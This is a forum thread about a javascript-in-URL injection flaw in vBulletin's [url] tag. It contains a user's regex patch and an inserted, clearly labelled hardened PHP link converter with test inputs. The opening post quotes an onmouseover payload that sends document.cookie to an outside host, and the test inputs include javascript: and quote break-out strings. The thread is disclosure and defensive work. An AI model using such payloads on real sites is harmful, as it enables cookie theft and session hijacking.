Security problem (javascript in urls)
  • Matthijs
    replied
    This is pretty cheesy, but it works:
    Change line 253 of global.php from:
    [code]$bbcode=eregi_replace("\\[url\\]([^\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
    to:
    [code]$bbcode=eregi_replace("\\[url\\]([^\\\"\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
    You'll have to insert the \\\" for the email tags too (a few lines down in global.php):
    [code]$bbcode=eregi_replace("\\[email\\]([^\\\"\\[]*)\\[/email\\]","<a href=\"mailto:\\1\">\\1</a>",$bbcode);[/code]
    Last edited by Matthijs; Tue 17 Apr '01, 1:16pm.
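    For comparison with the one-character patch above, here is an added example (not vBulletin's code and not Matthijs's patch) of a hardened [url]/[email] converter. The posted patch only forbids a literal " inside the tag, which stops the href attribute from being closed early; it does not reject a javascript: target, which is the case the thread title refers to. The example below accepts only http, https and ftp targets (and a syntactically valid address for [email]), HTML-escapes everything that lands in the attribute or the link text, and uses preg_replace_callback because eregi_replace() was removed from PHP. The function names and the sample inputs are constructed for this example.

```php
<?php
// Added example, not the global.php code from the thread.
// Hardened replacement for the eregi_replace() lines that turn
// [url]...[/url] and [email]...[/email] into HTML links.

function safe_url_attr(string $url): ?string
{
    $url = trim($url);
    // Control characters are rejected explicitly so that a scheme check
    // cannot be confused by embedded tabs or newlines.
    if (preg_match('/[\x00-\x1f\x7f]/', $url)) {
        return null;
    }
    // Only absolute http/https/ftp URLs without quotes, angle brackets or
    // whitespace are accepted; javascript: and friends never get this far.
    if (!preg_match('#^(https?|ftp)://[^\s"\'<>]+$#i', $url)) {
        return null;
    }
    // Escape for use inside a double-quoted attribute and as text.
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

function safe_email_attr(string $addr): ?string
{
    $addr = trim($addr);
    if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return htmlspecialchars($addr, ENT_QUOTES, 'UTF-8');
}

function render_bbcode_links(string $bbcode): string
{
    // Non-greedy match keeps one tag from swallowing the next one.
    $bbcode = preg_replace_callback(
        '#\[url\](.*?)\[/url\]#is',
        function (array $m): string {
            $href = safe_url_attr($m[1]);
            if ($href === null) {
                // Unusable target: emit escaped text only, never a link.
                return htmlspecialchars($m[1], ENT_QUOTES, 'UTF-8');
            }
            return '<a href="' . $href . '" target="_blank" rel="noopener">'
                 . $href . '</a>';
        },
        $bbcode
    );
    $bbcode = preg_replace_callback(
        '#\[email\](.*?)\[/email\]#is',
        function (array $m): string {
            $addr = safe_email_attr($m[1]);
            if ($addr === null) {
                return htmlspecialchars($m[1], ENT_QUOTES, 'UTF-8');
            }
            return '<a href="mailto:' . $addr . '">' . $addr . '</a>';
        },
        $bbcode
    );
    return $bbcode;
}

// Constructed sample posts (not taken from the thread).
$samples = [
    '[url]http://example.com/page[/url]',          // ordinary link, kept
    '[url]http://example.com/" title="x[/url]',    // attribute break-out attempt, rendered as escaped text
    '[url]javascript:alert(1)[/url]',              // javascript: target, rendered as plain text
    '[email]user@example.com[/email]',             // valid address, becomes a mailto: link
];
foreach ($samples as $s) {
    echo render_bbcode_links($s), "\n";
}
```

    Rejected targets are deliberately downgraded to escaped text rather than dropped, so a post with a malformed link still displays and the author can see what was filtered; the important property is that no unvalidated string ever reaches the href attribute.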

  • Matthijs
    replied
    This is very severe! 1.1.6 is still affected.
    I'm writing my own patch at the moment to stop this one from becoming a disaster.
    Will post it here when I'm done...
  • thetester
    started a topic Security problem (javascript in urls)
    If you take a look at my signature, you will see an example of javascript in the url vB code tag, which can cause serious security problems. I have only tested this on 1.1.4, but the admins on that board had to close down vB code totally to fix the security problem caused by things like onmouseover="window.open('sniffer.com/script?'+encode(document.cookie));